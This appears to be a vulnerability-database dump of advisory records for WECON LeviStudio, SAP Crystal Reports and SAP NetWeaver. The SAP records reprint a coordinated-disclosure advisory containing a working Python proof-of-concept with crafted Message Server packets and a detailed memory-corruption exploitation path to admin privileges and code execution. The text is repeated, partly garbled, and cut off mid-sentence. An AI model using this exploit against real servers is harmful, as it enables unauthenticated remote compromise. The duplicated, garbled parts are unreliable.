var-201809-0087 WECON LeviStudio Versions 1.8.29 and 1.8.44 have multiple stack-based buffer overflow vulnerabilities that can be exploited when the application processes specially crafted project files. This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Wecon LeviStudioU. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within the handling of UMP files. When parsing the EventSet WordAddr element, the process does not properly validate the length of user-supplied data prior to copying it to a fixed-length stack-based buffer. An attacker can leverage this vulnerability to execute code under the context of Administrator. WECON LeviStudio is a set of human interface programming software from WECON, China
var-201103-0371 SAP Crystal Reports Server is a complete reporting solution for creating, managing, and delivering reports through the web or embedded enterprise applications. There is an input validation error in SAP Crystal Reports Server. The input passed to aa-open-inlist.jsp via the \"url\", \"sWindow\", \"BEGIN_DATE\", \"END_DATE\", \"CURRENT_DATE\" and \"CURRENT_SLICE\" parameters is missing before returning to the user. Filtering can lead to cross-site scripting attacks
var-202001-0833 A Denial of Service vulnerability exists in the WRITE_C function in the msg_server.exe module in SAP NetWeaver 2004s, 7.01 SR1, 7.02 SP06, and 7.30 SP04 when sending a crafted SAP Message Server packet to TCP ports 36NN and/or 39NN. SAP NetWeaver Contains an array index validation vulnerability.Denial of service operation (DoS) May be in a state. This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of SAP Netweaver ABAP. Authentication is not required to exploit this vulnerability. The specific flaw exists within the msg_server.exe listening on 3900 by default. When the msg_server parses a message with opcode 0x43 and sub-opcode 0x04 it uses a user suplied size field to copy a string into a static sized stack buffer. The resulting buffer overflow can lead to remote code execution under the context of the process. Authentication is not required to exploit this vulnerability.The specific flaw exists within the way SAP NetWeaver handles packages with opcode 0x43. If a package with sub opcode 0x4 contains a long parameter value string NetWeaver will eventually write a \x00 byte onto the stack to mark the end of the string. SAP NetWeaver has a defect in the message with the opcode 0x43. SAP NetWeaver is the technical foundation for SAP Business Suite solutions, SAP xApps composite applications, partner solutions, and custom applications. Msg_server.exe listens to port 3900 by default. Arbitrary code. Successfully exploiting these issues may allow an attacker to execute arbitrary code with the privileges of the user running the affected application or cause denial-of-service conditions. The following products are affected: SAP Netweaver 2004s SAP Netweaver 7.01 SR1 SAP Netweaver 7.02 SP06 SAP Netweaver 7.30 SP04. Core Security - Corelabs Advisory http://corelabs.coresecurity.com/ CORE-2012-1128 1. *Advisory Information* Title: SAP Netweaver Message Server Multiple Vulnerabilities Advisory ID: CORE-2012-1128 Advisory URL: http://www.coresecurity.com/content/SAP-netweaver-msg-srv-multiple-vulnerabilities Date published: 2013-02-13 Date of last update: 2013-02-13 Vendors contacted: SAP Release mode: Coordinated release 2. *Vulnerability Information* Class: Improper Validation of Array Index [CWE-129], Buffer overflow [CWE-119] Impact: Code execution, Denial of service Remotely Exploitable: Yes Locally Exploitable: No CVE Name: CVE-2013-1592, CVE-2013-1593 3. By sending different messages, the different vulnerabilities can be triggered. 4. *Vulnerable packages* . Older versions are probably affected too, but they were not checked. 5. *Non-vulnerable packages* . Vendor did not provide this information. 6. *Vendor Information, Solutions and Workarounds* SAP released the security note 1800603 [2] regarding these issues. 7. *Credits* Vulnerability [CVE-2013-1592] was discovered by Martin Gallo and Francisco Falcon, and additional research was performed by Francisco Falcon. Vulnerability [CVE-2013-1593] was discovered and researched by Martin Gallo from Core Security Consulting Services. The publication of this advisory was coordinated by Fernando Miranda from Core Advisories Team. 8. *Technical Description / Proof of Concept Code* The following python script is the main PoC that can be used to reproduce all vulnerabilities described below: /----- import socket, struct from optparse import OptionParser # Parse the target options parser = OptionParser() parser.add_option("-d", "--hostname", dest="hostname", help="Hostname", default="localhost") parser.add_option("-p", "--port", dest="port", type="int", help="Port number", default=3900) (options, args) = parser.parse_args() client_string = '-'+' '*39 server_name = '-'+' '*39 def send_packet(sock, packet): packet = struct.pack("!I", len(packet)) + packet sock.send(packet) def receive(sock): length = sock.recv(4) (length, ) = struct.unpack("!I", length) data = "" while len(data)<length: data+= sock.recv(length) return (length, data) def initialize_connection(hostname, port): # Connect print "[*] Connecting to", hostname, "port", port connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM) connection.connect((hostname, port)) # Send initialization packet print "[*] Conected, sending login request" init = '**MESSAGE**\x00' # eyecatcher init+= '\x04' # version init+= '\x00' # errorno init+= client_string # toname init+= '\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' # msgtype/reserved/key init+= '\x01\x08' # flag / iflag (MS_LOGIN_2) init+= client_string # fromname init+= '\x00\x00' # padd send_packet(connection, init) # Receive response print "[*] Receiving login reply" (length, data) = receive(connection) # Parsing login reply server_name = data[4+64:4+64+40] return connection # Main PoC body connection = initialize_connection(options.hostname, options.port) send_attack(connection) -----/ In the following subsections, we give the python code that can be added after the script above in order to reproduce all vulnerabilities. 8.1. Malicious packets are processed by the vulnerable function '_MsJ2EE_AddStatistics' in the 'msg_server.exe' module. The vulnerable function '_MsJ2EE_AddStatistics' receives a pointer to a 'MSJ2EE_HEADER' struct as its third parameter, which is fully controlled by the attacker. This struct type is defined as follows: /----- 00000000 MSJ2EE_HEADER struct ; (sizeof=0x28, standard type) 00000000 senderclusterid dd ? 00000004 clusterid dd ? 00000008 serviceid dd ? 0000000C groupid dd ? 00000010 nodetype db ? 00000011 db ? ; undefined 00000012 db ? ; undefined 00000013 db ? ; undefined 00000014 totallength dd ? 00000018 currentlength dd ? 0000001C currentoffset dd ? 00000020 totalblocks db ? 00000021 currentblock db ? 00000021 00000022 db ? ; undefined 00000023 db ? ; undefined 00000024 messagetype dd ? 00000028 MSJ2EE_HEADER ends -----/ The '_MsJ2EE_AddStatistics' function uses the 'serviceid' field of the 'MSJ2EE_HEADER' to calculate an index to write into the 'j2ee_stat_services' global array, without properly validating that the index is within the boundaries of the array. On the other hand, 'j2ee_stat_services' is a global array of 256 elements of type 'MSJ2EE_STAT_ELEMENT': /----- .data:0090B9E0 ; MSJ2EE_STAT_ELEMENT j2ee_stat_services[256] .data:0090B9E0 j2ee_stat_services MSJ2EE_STAT_ELEMENT 100h dup(<?>) .data:0090B9E0 ; DATA XREF: _MsJ2EE_AddStatistics+24o .data:0090B9E0 ; _MsJ2EE_AddStatistics+4Co ... -----/ This vulnerability can be used to corrupt arbitrary memory with arbitrary values, with some restrictions. The following snippet shows the vulnerable code within the '_MsJ2EE_AddStatistics' function: /----- mov edi, [ebp+pJ2eeHeader] mov eax, [edi+MSJ2EE_HEADER.serviceid] ;attacker controls MSJ2EE_HEADER.serviceid xor ecx, ecx cmp dword ptr j2ee_stat_total.totalMsgCount+4, ecx lea esi, [eax+eax*8] lea esi, j2ee_stat_services.totalMsgCount[esi*8] ;using the index without validating array bounds -----/ Since the 'serviceid' value is first multiplied by 9 and then it is multiplied by 8, the granularity of the memory addresses that can be targeted for memory corruption is 0x48 bytes, which is the size of the 'MSJ2EE_STAT_ELEMENT' struct: /----- 00000000 MSJ2EE_STAT_ELEMENT struc ; (sizeof=0x48, standard type) 00000000 ; XREF: .data:j2ee_stat_totalr 00000000 ; .data:j2ee_stat_servicesr 00000000 totalMsgCount dq ? ; XREF: _MsJ2EE_AddStatistics+1Br 00000000 ; _MsJ2EE_AddStatistics+2Fr ... 00000008 totalMsgLength dq ? ; XREF: _MsJ2EE_AddStatistics+192r 00000008 ; _MsJ2EE_AddStatistics+19Br ... 00000010 avgMsgLength dq ? ; XREF: _MsJ2EE_AddStatistics+1C2w 00000010 ; _MsJ2EE_AddStatistics+1C7w ... 00000018 maxLength dq ? ; XREF: _MsJ2EE_AddStatistics+161r 00000018 ; _MsJ2EE_AddStatistics+16Er ... 00000020 noP2PMessage dq ? ; XREF: _MsJ2EE_AddStatistics:loc_44D442w 00000020 ; _MsJ2EE_AddStatistics+158w ... 00000028 noP2PRequest dq ? ; XREF: _MsJ2EE_AddStatistics+144w 00000028 ; _MsJ2EE_AddStatistics+14Aw ... 00000030 noP2PReply dq ? ; XREF: _MsJ2EE_AddStatistics+132w 00000030 ; _MsJ2EE_AddStatistics+138w ... 00000038 noBroadcastMessage dq ? ; XREF: _MsJ2EE_AddStatistics:loc_44D40Dw 00000038 ; _MsJ2EE_AddStatistics+123w ... 00000040 noBroadcastRequest dq ? ; XREF: _MsJ2EE_AddStatistics+10Fw 00000040 ; _MsJ2EE_AddStatistics+115w ... 00000048 MSJ2EE_STAT_ELEMENT ends -----/ However, it is possible to use different combinations of the 'flag/iflag' values in the Message Server packet to gain more precision over the memory addresses that can be corrupted. Different combinations of 'flag/iflag' values provide different memory corruption primitives, as shown below: /----- At this point: * ESI points to an arbitrary, attacker-controlled memory address * EBX == 1 .text:0044D359 movzx eax, [ebp+msiflag] .text:0044D35D sub eax, 0Ch .text:0044D360 jz short loc_44D37C .text:0044D362 sub eax, ebx .text:0044D364 jnz short loc_44D39D .text:0044D366 cmp [ebp+msflag], 2 .text:0044D36A jnz short loc_44D374 .text:0044D36C add [esi+40h], ebx ; iflag=0xd, flag=2 => add 1 to [esi+0x40] .text:0044D36F adc [esi+44h], ecx .text:0044D372 jmp short loc_44D39D .text:0044D374 ; --------------------------------------------------------------------------- .text:0044D374 .text:0044D374 loc_44D374: ; CODE XREF: _MsJ2EE_AddStatistics+7Aj .text:0044D374 add [esi+38h], ebx ; iflag=0xd, flag=1 => add 1 to [esi+0x38] .text:0044D377 adc [esi+3Ch], ecx .text:0044D37A jmp short loc_44D39D .text:0044D37C ; --------------------------------------------------------------------------- .text:0044D37C .text:0044D37C loc_44D37C: ; CODE XREF: _MsJ2EE_AddStatistics+70j .text:0044D37C mov al, [ebp+msflag] .text:0044D37F cmp al, 3 .text:0044D381 jnz short loc_44D38B .text:0044D383 add [esi+30h], ebx ; iflag=0xc, flag=3 => add 1 to [esi+0x30] .text:0044D386 adc [esi+34h], ecx .text:0044D389 jmp short loc_44D39D .text:0044D38B ; --------------------------------------------------------------------------- .text:0044D38B .text:0044D38B loc_44D38B: ; CODE XREF: _MsJ2EE_AddStatistics+91j .text:0044D38B cmp al, 2 .text:0044D38D jnz short loc_44D397 .text:0044D38F add [esi+28h], ebx ; iflag=0xc, flag=2 => add 1 to [esi+0x28] .text:0044D392 adc [esi+2Ch], ecx .text:0044D395 jmp short loc_44D39D .text:0044D397 ; --------------------------------------------------------------------------- .text:0044D397 .text:0044D397 loc_44D397: ; CODE XREF: _MsJ2EE_AddStatistics+9Dj .text:0044D397 add [esi+20h], ebx ; iflag=0xc, flag=1 => add 1 to [esi+0x20] .text:0044D39A adc [esi+24h], ecx [...] -----/ And the following code excerpt is always executed within the '_MsJ2EE_AddStatistics' function, providing two more memory corruption primitives: /----- .text:0044D3B7 add [esi], ebx ;add 1 to [esi] .text:0044D3B9 adc dword ptr [esi+4], 0 .text:0044D3BD mov eax, [edi+MSJ2EE_HEADER.totallength] ;MSJ2EE_HEADER.totallength is fully controlled by the attacker .text:0044D3C0 cdq .text:0044D3C1 add [esi+8], eax ;add an arbitrary number to [esi+8] -----/ This memory corruption vulnerability can be used by remote unauthenticated attackers to execute arbitrary code on vulnerable installations of SAP Netweaver, but it can also be abused to modify the internal state of the vulnerable service in order to gain administrative privileges within the SAP Netweaver Message Server. A client connected to the Message Server may have administrative privileges or not. The Message Server holds a structure of type 'MSADM_s' for each connected client, which contains information about that very connection. Relevant parts of the 'MSADM_s' struct type are shown below: /----- 00000000 MSADM_s struc ; (sizeof=0x538, standard type) 00000000 ; XREF: .data:dummy_clientr 00000000 client_type dd ? ; enum MS_CLIENT_TYPE 00000004 stat dd ? ; enum MS_STAT 00000008 connection_ID dd ? 0000000C status db ? 0000000D dom db ? ; XREF: MsSFillCon+3Cw 0000000E admin_allowed db ? 0000000F db ? ; undefined 00000010 name dw 40 dup(?) [...] 00000534 _padding db 4 dup(?) 00000538 MSADM_s ends -----/ The 'admin_allowed' field at offset 0x0E is a boolean value that indicates whether the connected client has administrative privileges or not. When a new client connects, the 'MsSLoginClient' function of the Message Server sets the proper value for the 'admin_allowed' field in the 'MSADM_s' struct instance associated with that client: /----- .text:004230DC loc_4230DC: ; CODE XREF: MsSLoginClient+AAAj .text:004230DC ; MsSLoginClient+B26j .text:004230DC cmp byte ptr [edi+0Eh], 0 ; privileged client? .text:004230E0 jnz short loc_4230EA ; if yes, jump .text:004230E2 mov al, byte ptr ms_admin_allowed ; otherwise, grab the value of the "ms_admin_allowed" global variable... .text:004230E7 mov [edi+0Eh], al ; ...and save it to MSADM_s.admin_allowed -----/ So if we manage to overwrite the value of the 'ms_admin_allowed' global variable with a value different than 0, then we can grant administrative privileges to our unprivileged connections. In SAP Netweaver 'msg_server.exe' v7200.70.18.23869, the 'ms_admin_allowed' global variable is located at '0x008f17f0': /----- .data:008F17F0 ; int ms_admin_allowed .data:008F17F0 ms_admin_allowed dd ? ; DATA XREF: MsSSetMonitor+7Ew .data:008F17F0 ; MsSLoginClient+B62r -----/ And the 'j2ee_stat_services' global array, which is the array that can be indexed outside its bounds, is located at '0x0090b9e0': /----- .data:0090B9E0 ; MSJ2EE_STAT_ELEMENT j2ee_stat_services[256] .data:0090B9E0 j2ee_stat_services MSJ2EE_STAT_ELEMENT 100h dup(<?>) .data:0090B9E0 ; DATA XREF: _MsJ2EE_AddStatistics+24o .data:0090B9E0 ; _MsJ2EE_AddStatistics+4Co ... -----/ So, by providing 'MSJ2EE_HEADER.serviceid == 0x038E3315', we will be targeting '0x008F17C8' as the base address for memory corruption. Having in mind the different memory corruption primitives based on combinations of 'flag/iflag' fields described above, by specifying 'iflag == 0xC' and 'flag == 0x2' in our Message Server packet we will be able to add 1 to '[0x008F17C8+0x28]', effectively overwriting the contents of '0x008F17F0' ('ms_admin_allowed'). After overwriting 'ms_admin_allowed', all of our future connections will have administrative privileges within the Message Server. After gaining administrative privileges for our future connections, there are at least two possible paths of exploitation: 1. Of course it is not mandatory to have administrative privileges in order to overwrite function pointers, but considering the limitation of targetable addresses imposed by the little granularity of the memory corruption, some of the most handy-to-exploit function pointers happened to be accessible just for administrative connections. 2. Modify the configuration and behavior of the server. That includes changing Message Server's runtime parameters and enabling Monitor Mode in the affected server. 8.1.1. *Gaining remote code execution by overwriting function pointers* Having in mind that the granularity of the memory addresses that can be targeted for memory corruption is not that flexible (0x48 bytes) and the limited memory corruption primitives available, it takes some effort to find a function pointer that can be overwritten with a useful value and which can be later triggered with a network packet. One possibility is to overwrite one of the function pointers which are in charge of handling the modification of Message Server parameters: /----- .data:0087DED0 ; SHMPRF_CHANGEABLE_PARAMETER ms_changeable_parameter[58] ; function pointers associated to the modification of the "ms/max_sleep" parameter .data:0087DED0 ms_changeable_parameter SHMPRF_CHANGEABLE_PARAMETER <offset aMsMax_sleep, \ .data:0087DED0 offset MsSTestInteger, \ ; "rdisp/TRACE_PATTERN_2" .data:0087DED0 offset MsSSetMaxSleep> ; function pointers associated to the modification of the "ms/max_vhost" parameter .data:0087DED0 SHMPRF_CHANGEABLE_PARAMETER <offset aMsMax_vhost, \ .data:0087DED0 offset MsSTestInteger, \ ;<-- we can overwrite this one .data:0087DED0 offset MsSSetMaxVirtHost> [...] -----/ By providing 'MSJ2EE_HEADER.serviceid == 0x038E1967' we can target '0x0087DED8' as the base address for memory corruption. In this case we can use the memory corruption primitive at address '0x0044D3C1' that always gets executed, which will allow us to add an arbitrary number (the value of 'MSJ2EE_HEADER.totallength') to '[0x0087DED8+8]' effectively overwriting the function pointer shown above ('ms_changeable_parameter[1].set'). After that we need to send a 'MS_SET_PROPERTY' request, specifying 'ms/max_vhost' as the name of the property to be changed. This 'MS_SET_PROPERTY' packet will make our overwritten function pointer to be called from the 'MsSChangeParam' function: /----- .text:00404DB3 loc_404DB3: ; CODE XREF: MsSChangeParam+CDj .text:00404DB3 lea esi, [edi+edi*2] .text:00404DB6 mov edi, [ebp+pvalue] .text:00404DB9 add esi, esi .text:00404DBB mov edx, ms_changeable_parameter.test[esi+esi] .text:00404DC2 add esi, esi .text:00404DC4 push edi .text:00404DC5 push pname .text:00404DC6 call edx ; call our overwritten function pointer -----/ 'MS_SET_PROPERTY' packets will be ignored by the Message Server if the requesting client does not have administrative privileges, so it is necessary to gain administrative privileges as explained above before using the memory corruption vulnerability to overwrite one of the function pointers in the 'ms_changeable_parameter' global array. 8.1.2. *Modify the configuration and behavior of the server* After gaining administrative privileges for our connections, it is possible to perform 'MS_SET_PROPERTY' packets against the Message Server in order to modify its configuration and behavior. That makes possible, for example, to add virtual hosts to the load balancer, or to enable Monitor Mode [3] (transaction SMMS) on the affected server. Enabling Monitor Mode takes two steps: 1. Send a 'MS_SET_PROPERTY' packet with property 'name == "ms/monitor"', property 'value == 1'. 2. Send a 'MS_SET_PROPERTY' packet with property 'name == "ms/admin_port"', property 'value == 3535' (or any other arbitrary port number). The following python code can be used to trigger the vulnerability: /----- def send_attack(connection): print "[*] Sending crash packet" crash = '**MESSAGE**\x00' # eyecatcher crash+= '\x04' # version crash+= '\x00' # errorno crash+= server_name # toname crash+= '\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' # msgtype/reserved/key crash+= '\x04\x0d' # flag/iflag crash+= client_string # fromname crash+= '\x00\x00' # padd crash+= "ABCDEFGH"+"\x01\x00\x00\x00"+"MNOPQRSTUVWXYZ0123"+"\x01"+"56789abcd" crash+= "\x00\x00\x00\x01" crash+= "\xff\xff\xff\xff" crash+= "\x00\x00\x00\x00" send_packet(connection, crash) print "[*] Crash sent !" -----/ 8.2. Malicious packets are processed by the vulnerable function 'WRITE_C' in the 'msg_server.exe' module. The following python code can be used to trigger the vulnerability: /----- def send_attack(connection): print "[*] Sending crash packet" crash = '**MESSAGE**\x00' # eyecatcher crash+= '\x04' # version crash+= '\x00' # errorno crash+= server_name # toname crash+= '\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' # msgtype/reserved/key crash+= '\x04\x05' # flag/iflag crash+= client_string # fromname crash+= '\x00\x00' # padd crash+= "AD-EYECATCH\x00" crash+= "\x01\x01" crash+= "%11d" % 104 crash+= "%11d" % 1 crash+= "\x15\x00\x00\x00" crash+= "\x20\x00\x00\xc8" crash+= "LALA" + ' '*(20-4) crash+= "LOLO" + ' '*(40-4) crash+= " "*36 send_packet(connection, crash) print "[*] Crash sent !" -----/ 9. *Report Timeline* . 2012-12-10: Core Security Technologies notifies the SAP team of the vulnerability, setting the estimated publication date of the advisory for January 22nd, 2013. 2012-12-10: Core sends an advisory draft with technical details and a PoC. 2012-12-11: The SAP team confirms the reception of the issue. 2012-12-21: SAP notifies that they concluded the analysis of the reported issues and confirms two out of the five vulnerabilities. Vendor also notifies that the other three reported issues were already fixed in February, 2012. Vendor also notifies that the necessary code changes are being done and extensive tests will follow. The corresponding security note and patches are planned to be released on the Security Patch Day in Feb 12th 2013. 2012-12-21: Core re-schedules the advisory publication for Feb 12th, 2013. 2012-12-28: SAP notifies Core that they will be contacted if tests fails in order to re-schedule the advisory publication. 2013-01-22: First release date missed. 2013-01-28: SAP notifies that they are still confident with releasing a security note and patches on Feb 12th as planned. 2013-01-29: Core acknowledges receiving the information and notifies that everything is ready for public disclosing on Feb 12th. Core also asks additional information regarding the patched vulnerabilities mentioned in [2012-12-21], including links to security bulletin, CVEs, and patches in order to verify if those patches effectively fix the reported flaws. 2013-02-01: SAP notifies that the patched vulnerabilities mentioned in [2012-12-21] were reported in [5] and no CVE were assigned to them. Those vulnerabilities seems to be related to ZDI advisories [6], [7], [8]. 2013-02-06: Core notifies that the patched vulnerabilities will be removed from the advisory and asks additional information regarding the affected and patched version numbers. 2013-02-01: SAP notifies that the security note 1800603 will be released and that note will provide further information regarting this vulnerability. 2013-02-13: Advisory CORE-2012-1128 published. 10. *References* [1] http://www.sap.com/platform/netweaver/index.epx. [2] SAP Security note Feb 2013 https://service.sap.com/sap/support/notes/1800603. [3] http://help.sap.com/saphelp_nw70ehp2/helpdata/en/47/bdc344cc104231e10000000a421937/content.htm. [4] http://help.sap.com/saphelp_nw70ehp2/helpdata/en/47/c2e782b8fd3020e10000000a42189d/frameset.htm. [5] SAP Security notes Feb 2012 https//service.sap.com/sap/support/notes/1649840. [6] http://www.zerodayinitiative.com/advisories/ZDI-12-104/. [7] http://www.zerodayinitiative.com/advisories/ZDI-12-111/. [8] http://www.zerodayinitiative.com/advisories/ZDI-12-112/. 11. *About CoreLabs* CoreLabs, the research center of Core Security Technologies, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://corelabs.coresecurity.com. 12. *About Core Security Technologies* Core Security Technologies enables organizations to get ahead of threats with security test and measurement solutions that continuously identify and demonstrate real-world exposures to their most critical assets. Our customers can gain real visibility into their security standing, real validation of their security controls, and real metrics to more effectively secure their organizations. Core Security's software solutions build on over a decade of trusted research and leading-edge threat expertise from the company's Security Consulting Services, CoreLabs and Engineering groups. Core Security Technologies can be reached at +1 (617) 399-6980 or on the Web at: http://www.coresecurity.com. 13. *Disclaimer* The contents of this advisory are copyright (c) 2012 Core Security Technologies and (c) 2012 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/ 14. *PGP/GPG Keys* This advisory has been signed with the GPG key of Core Security Technologies advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 ZDI-12-111 : SAP Netweaver ABAP msg_server.exe Opcode 0x43 Remote Code Execution Vulnerability http://www.zerodayinitiative.com/advisories/ZDI-12-111 June 28, 2012 - -- CVE ID: - -- CVSS: 10, AV:N/AC:L/Au:N/C:C/I:C/A:C - -- Affected Vendors: SAP - -- Affected Products: SAP NetWeaver - -- TippingPoint(TM) IPS Customer Protection: TippingPoint IPS customers have been protected against this vulnerability by Digital Vaccine protection filter ID 12407. - -- Vendor Response: SAP has issued an update to correct this vulnerability. More details can be found at: http://www.sdn.sap.com/irj/sdn/index?rid=/webcontent/uuid/c05604f6-4eb3-2d1 0-eea7-ceb666083a6a#section40 - -- Disclosure Timeline: 2011-10-28 - Vulnerability reported to vendor 2012-06-28 - Coordinated public release of advisory - -- Credit: This vulnerability was discovered by: * e6af8de8b1d4b2b6d5ba2610cbf9cd38 - -- About the Zero Day Initiative (ZDI): Established by TippingPoint, The Zero Day Initiative (ZDI) represents a best-of-breed model for rewarding security researchers for responsibly disclosing discovered vulnerabilities. Researchers interested in getting paid for their security research through the ZDI can find more information and sign-up at: http://www.zerodayinitiative.com The ZDI is unique in how the acquired vulnerability information is used. Instead, upon notifying the affected product vendor, TippingPoint provides its customers with zero day protection through its intrusion prevention technology. Explicit details regarding the specifics of the vulnerability are not exposed to any parties until an official vendor patch is publicly available. Furthermore, with the altruistic aim of helping to secure a broader user base, TippingPoint provides this vulnerability information confidentially to security vendors (including competitors) who have a vulnerability protection or mitigation product. Our vulnerability disclosure policy is available online at: http://www.zerodayinitiative.com/advisories/disclosure_policy/ Follow the ZDI on Twitter: http://twitter.com/thezdi -----BEGIN PGP SIGNATURE----- Version: PGP Desktop 10.2.0 (Build 1950) Charset: utf-8 wsBVAwUBT+yszFVtgMGTo1scAQLv/wf+MRiEiaRsMyaVgI7MTDUo9sXprBObQ6QM yIlVyGLjwEQrO9KsUMlCj/pfLkgjcHYpCNxcrB0+6ZgtphkIQhrB3w0sj/fjRyn1 Vuugvjazu8xffqujZ2ymaQHR+toaQjeKrtWvVbaTdJI6EFuUi+qT5MrZQfRWhE2X uqXdLphMXYH+SRhNtD+zJhxg4U4emVvirqNJa9YLwFE0UpxGRksKCB4Cx89o2QWE NiC9bPznAVCMOBh/R/8uROXkg1Jg9YBhEu7wzJY95Yfsl4oWpSO0cQOCF0WAWiHi TsUy3xHAjW7gMz7v/QMleok6C/7safK/7qjJRMDrGUQO1csmlZUkAg== =FVga -----END PGP SIGNATURE-----
var-202001-0832 A Buffer Overflow vulnerability exists in the Message Server service _MsJ2EE_AddStatistics() function when sending specially crafted SAP Message Server packets to remote TCP ports 36NN and/or 39NN in SAP NetWeaver 2004s, 7.01 SR1, 7.02 SP06, and 7.30 SP04, which could let a remote malicious user execute arbitrary code. SAP NetWeaver Contains a classic buffer overflow vulnerability.Information is acquired, information is falsified, and denial of service (DoS) May be in a state. Authentication is not required to exploit this vulnerability. The specific flaw exists within the msg_server.exe listening on 3900 by default. When the msg_server parses a message with opcode 0x43 and sub-opcode 0x04 it uses a user suplied size field to copy a string into a static sized stack buffer. The resulting buffer overflow can lead to remote code execution under the context of the process. Authentication is not required to exploit this vulnerability.The specific flaw exists within the way SAP NetWeaver handles packages with opcode 0x43. If a package with sub opcode 0x4 contains a long parameter value string NetWeaver will eventually write a \x00 byte onto the stack to mark the end of the string. SAP NetWeaver has a defect in the message with the opcode 0x43. SAP NetWeaver is the technical foundation for SAP Business Suite solutions, SAP xApps composite applications, partner solutions, and custom applications. Msg_server.exe listens to port 3900 by default. Arbitrary code. Successfully exploiting these issues may allow an attacker to execute arbitrary code with the privileges of the user running the affected application or cause denial-of-service conditions. The following products are affected: SAP Netweaver 2004s SAP Netweaver 7.01 SR1 SAP Netweaver 7.02 SP06 SAP Netweaver 7.30 SP04. The vulnerability is due to a memory pointer error while processing certain packets by the affected software. Core Security - Corelabs Advisory http://corelabs.coresecurity.com/ CORE-2012-1128 1. *Advisory Information* Title: SAP Netweaver Message Server Multiple Vulnerabilities Advisory ID: CORE-2012-1128 Advisory URL: http://www.coresecurity.com/content/SAP-netweaver-msg-srv-multiple-vulnerabilities Date published: 2013-02-13 Date of last update: 2013-02-13 Vendors contacted: SAP Release mode: Coordinated release 2. *Vulnerability Information* Class: Improper Validation of Array Index [CWE-129], Buffer overflow [CWE-119] Impact: Code execution, Denial of service Remotely Exploitable: Yes Locally Exploitable: No CVE Name: CVE-2013-1592, CVE-2013-1593 3. By sending different messages, the different vulnerabilities can be triggered. 4. *Vulnerable packages* . Older versions are probably affected too, but they were not checked. 5. *Non-vulnerable packages* . Vendor did not provide this information. 6. *Vendor Information, Solutions and Workarounds* SAP released the security note 1800603 [2] regarding these issues. 7. *Credits* Vulnerability [CVE-2013-1592] was discovered by Martin Gallo and Francisco Falcon, and additional research was performed by Francisco Falcon. Vulnerability [CVE-2013-1593] was discovered and researched by Martin Gallo from Core Security Consulting Services. The publication of this advisory was coordinated by Fernando Miranda from Core Advisories Team. 8. *Technical Description / Proof of Concept Code* The following python script is the main PoC that can be used to reproduce all vulnerabilities described below: /----- import socket, struct from optparse import OptionParser # Parse the target options parser = OptionParser() parser.add_option("-d", "--hostname", dest="hostname", help="Hostname", default="localhost") parser.add_option("-p", "--port", dest="port", type="int", help="Port number", default=3900) (options, args) = parser.parse_args() client_string = '-'+' '*39 server_name = '-'+' '*39 def send_packet(sock, packet): packet = struct.pack("!I", len(packet)) + packet sock.send(packet) def receive(sock): length = sock.recv(4) (length, ) = struct.unpack("!I", length) data = "" while len(data)<length: data+= sock.recv(length) return (length, data) def initialize_connection(hostname, port): # Connect print "[*] Connecting to", hostname, "port", port connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM) connection.connect((hostname, port)) # Send initialization packet print "[*] Conected, sending login request" init = '**MESSAGE**\x00' # eyecatcher init+= '\x04' # version init+= '\x00' # errorno init+= client_string # toname init+= '\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' # msgtype/reserved/key init+= '\x01\x08' # flag / iflag (MS_LOGIN_2) init+= client_string # fromname init+= '\x00\x00' # padd send_packet(connection, init) # Receive response print "[*] Receiving login reply" (length, data) = receive(connection) # Parsing login reply server_name = data[4+64:4+64+40] return connection # Main PoC body connection = initialize_connection(options.hostname, options.port) send_attack(connection) -----/ In the following subsections, we give the python code that can be added after the script above in order to reproduce all vulnerabilities. 8.1. Malicious packets are processed by the vulnerable function '_MsJ2EE_AddStatistics' in the 'msg_server.exe' module. The vulnerable function '_MsJ2EE_AddStatistics' receives a pointer to a 'MSJ2EE_HEADER' struct as its third parameter, which is fully controlled by the attacker. This struct type is defined as follows: /----- 00000000 MSJ2EE_HEADER struct ; (sizeof=0x28, standard type) 00000000 senderclusterid dd ? 00000004 clusterid dd ? 00000008 serviceid dd ? 0000000C groupid dd ? 00000010 nodetype db ? 00000011 db ? ; undefined 00000012 db ? ; undefined 00000013 db ? ; undefined 00000014 totallength dd ? 00000018 currentlength dd ? 0000001C currentoffset dd ? 00000020 totalblocks db ? 00000021 currentblock db ? 00000021 00000022 db ? ; undefined 00000023 db ? ; undefined 00000024 messagetype dd ? 00000028 MSJ2EE_HEADER ends -----/ The '_MsJ2EE_AddStatistics' function uses the 'serviceid' field of the 'MSJ2EE_HEADER' to calculate an index to write into the 'j2ee_stat_services' global array, without properly validating that the index is within the boundaries of the array. On the other hand, 'j2ee_stat_services' is a global array of 256 elements of type 'MSJ2EE_STAT_ELEMENT': /----- .data:0090B9E0 ; MSJ2EE_STAT_ELEMENT j2ee_stat_services[256] .data:0090B9E0 j2ee_stat_services MSJ2EE_STAT_ELEMENT 100h dup(<?>) .data:0090B9E0 ; DATA XREF: _MsJ2EE_AddStatistics+24o .data:0090B9E0 ; _MsJ2EE_AddStatistics+4Co ... -----/ This vulnerability can be used to corrupt arbitrary memory with arbitrary values, with some restrictions. The following snippet shows the vulnerable code within the '_MsJ2EE_AddStatistics' function: /----- mov edi, [ebp+pJ2eeHeader] mov eax, [edi+MSJ2EE_HEADER.serviceid] ;attacker controls MSJ2EE_HEADER.serviceid xor ecx, ecx cmp dword ptr j2ee_stat_total.totalMsgCount+4, ecx lea esi, [eax+eax*8] lea esi, 